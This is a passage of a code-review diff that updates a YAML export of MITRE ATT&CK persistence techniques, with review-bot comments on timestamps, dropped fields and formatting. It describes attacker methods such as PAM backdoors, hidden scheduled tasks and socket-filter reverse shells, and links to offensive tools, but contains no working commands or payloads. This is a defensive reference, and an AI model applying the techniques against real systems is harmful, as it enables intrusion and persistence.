Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
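Review bot: beyond the reflow, this hunk drops the sentence stating that `at.exe` cannot access tasks created with `schtasks` or the Control Panel, and adds the `Invoke-CimMethod` / `PS_ScheduledTask` WMI path together with two new citation keys (`Stack Overflow`, `Red Canary - Atomic Red Team`). Both are content changes inside the upstream description, not formatting; confirm they match the ATT&CK text of the release this patch targets rather than being artifacts of the regeneration.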
@@ -27057,7 +27442,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27089,8 +27474,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27104,6 +27489,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -27116,16 +27505,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
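Review bot: the `modified` timestamp for T1205.002 moves backward here (`2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`), and the same regression appears for T1133, T1546.006, T1547.014 and T1542.005 later in this patch. The old values all share the `T14:00:00.188Z` suffix, so they look like release-bundle timestamps rather than per-object ones; if the new export now reads each object's own STIX `modified`, that is an improvement, but it should be stated in the commit message so the apparent "older" objects are not mistaken for a stale source.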
@@ -27188,7 +27580,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27253,49 +27644,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
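Review bot: the description context lines here are split before punctuation (`pam_unix.so` / `, which retrieves`, `/etc/passwd` / `and /etc/shadow` / `.(Citation: Apple PAM)`), which looks like inline code markup stripped by the exporter with a stray newline left behind; the same pattern shows in the `/etc/pam.d/` detection text below and in `HKLM\SYSTEM\CurrentControlSet\Services` for T1574.011. Since this patch re-serializes these objects anyway, fix the exporter's handling of code spans in the same pass rather than shipping the breaks again. Separately, T1556.003 is rewritten with a different key order (platforms, domains, contributors, id and external_references moved below the description); a stable key order would reduce this hunk to the `modified` change alone.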
@@ -27310,20 +27662,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
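Review bot: `x_mitre_permissions_required: - root` is dropped from T1556.003 with nothing replacing it, while T1053.003 later in this patch keeps `x_mitre_permissions_required: - User`; confirm that upstream actually removed the field for this object rather than the exporter silently dropping it, because tooling that ranks techniques by required privilege will change behaviour. The rest of the hunk (`x_mitre_deprecated: false`, `revoked: false`, `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, `x_mitre_version` `2.0` to `2.1`, external_references reordered so `PAM Creds` precedes `Red Hat PAM` with identical URLs) matches the newer STIX layout used for the other re-serialized objects.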
@@ -27413,7 +27802,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27501,7 +27889,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27586,11 +27973,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27668,7 +28054,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -27701,7 +28086,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27724,11 +28109,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27786,9 +28170,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -27869,12 +28252,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27893,7 +28275,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -27907,7 +28288,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -27934,8 +28314,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27966,7 +28346,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -28023,11 +28404,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28099,9 +28479,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28117,12 +28497,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28197,7 +28576,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28240,7 +28618,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28264,8 +28642,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
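Review bot: T1542.005 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk and nothing is added back before `atomic_tests: []`, whereas T1574.011 in the same patch has `x_mitre_attack_spec_version: 3.2.0` re-added at the end of the object. Verify that T1542.005 still carries `x_mitre_attack_spec_version` after this change (it may be re-added in an unshown part of the object); if not, the exporter is dropping a field for objects that upstream has not re-versioned. The `modified` date for this object also moved back to `2020-10-22T16:35:53.806Z` in the previous hunk.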
@@ -28420,31 +28796,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28461,6 +28817,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28471,9 +28828,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28481,17 +28842,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
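Review bot: `x_mitre_remote_support: false` is a field that appears on no other object in this part of the patch, so whatever consumes this YAML (index generators, schema checks) should be confirmed to accept an unknown `x_mitre_` key before this lands. Otherwise T1053.003 follows the same re-layout as T1556.003: `type`, `id`, `created` and `external_references` move below the description, `revoked: false` is added, `x_mitre_version` goes `1.1` to `1.2` and `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, with `x_mitre_permissions_required: - User` retained here.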
@@ -28499,79 +28880,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
